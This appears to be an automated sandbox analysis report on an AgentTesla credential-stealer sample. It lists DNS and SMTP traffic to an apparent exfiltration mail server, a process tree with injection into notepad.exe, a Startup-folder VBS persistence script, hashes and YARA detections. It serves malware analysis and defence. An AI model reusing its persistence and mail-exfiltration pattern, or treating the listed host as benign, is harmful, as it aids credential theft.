                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Nov 21, 2020 10:36:42.922708035 CET192.168.2.38.8.8.80xd70bStandard query (0)mail.hybridgroupco.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Nov 21, 2020 10:36:42.969963074 CET8.8.8.8192.168.2.30xd70bNo error (0)mail.hybridgroupco.comhybridgroupco.comCNAME (Canonical name)IN (0x0001)
                                                                  Nov 21, 2020 10:36:42.969963074 CET8.8.8.8192.168.2.30xd70bNo error (0)hybridgroupco.com66.70.204.222A (IP address)IN (0x0001)

                                                                  SMTP Packets

                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  Nov 21, 2020 10:36:43.337428093 CET5874973166.70.204.222192.168.2.3220-host.theserver.live ESMTP Exim 4.93 #2 Sat, 21 Nov 2020 13:36:43 +0400
                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                  220 and/or bulk e-mail.
                                                                  Nov 21, 2020 10:36:43.338118076 CET49731587192.168.2.366.70.204.222EHLO 141700
                                                                  Nov 21, 2020 10:36:43.441622019 CET5874973166.70.204.222192.168.2.3250-host.theserver.live Hello 141700 [84.17.52.25]
                                                                  250-SIZE 52428800
                                                                  250-8BITMIME
                                                                  250-PIPELINING
                                                                  250-STARTTLS
                                                                  250 HELP
                                                                  Nov 21, 2020 10:36:43.442186117 CET49731587192.168.2.366.70.204.222STARTTLS
                                                                  Nov 21, 2020 10:36:43.547034979 CET5874973166.70.204.222192.168.2.3220 TLS go ahead

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Start time:10:36:04
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe'
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.199767698.0000000002705000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.199649349.0000000002692000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:05
                                                                  Start date:21/11/2020
                                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\notepad.exe
                                                                  Imagebase:0xa70000
                                                                  File size:236032 bytes
                                                                  MD5 hash:D693F13FE3AA2010B854C4C60671B8E2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:36:05
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe'
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.462629290.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.464088936.00000000009E2000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.464255746.0000000002242000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.467655668.0000000002A92000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.464010082.0000000000980000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.462860776.0000000000475000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.467418503.00000000029D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.467888799.0000000002B70000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:06
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:15
                                                                  Start date:21/11/2020
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs'
                                                                  Imagebase:0x7ff6149f0000
                                                                  File size:163840 bytes
                                                                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:36:16
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe'
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:Borland Delphi
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.229601884.00000000027C5000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:17
                                                                  Start date:21/11/2020
                                                                  Path:C:\Windows\SysWOW64\notepad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\notepad.exe
                                                                  Imagebase:0xa70000
                                                                  File size:236032 bytes
                                                                  MD5 hash:D693F13FE3AA2010B854C4C60671B8E2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:10:36:17
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe'
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.223712280.0000000000475000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.224265072.0000000002150000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.224575545.0000000002292000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000001.223334796.0000000000499000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.224389648.00000000021B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:10:36:18
                                                                  Start date:21/11/2020
                                                                  Path:C:\Users\user\Desktop\DOC04121993.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421
                                                                  Imagebase:0x400000
                                                                  File size:978432 bytes
                                                                  MD5 hash:710843B45A8E65C939D3AB4FB96D73E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >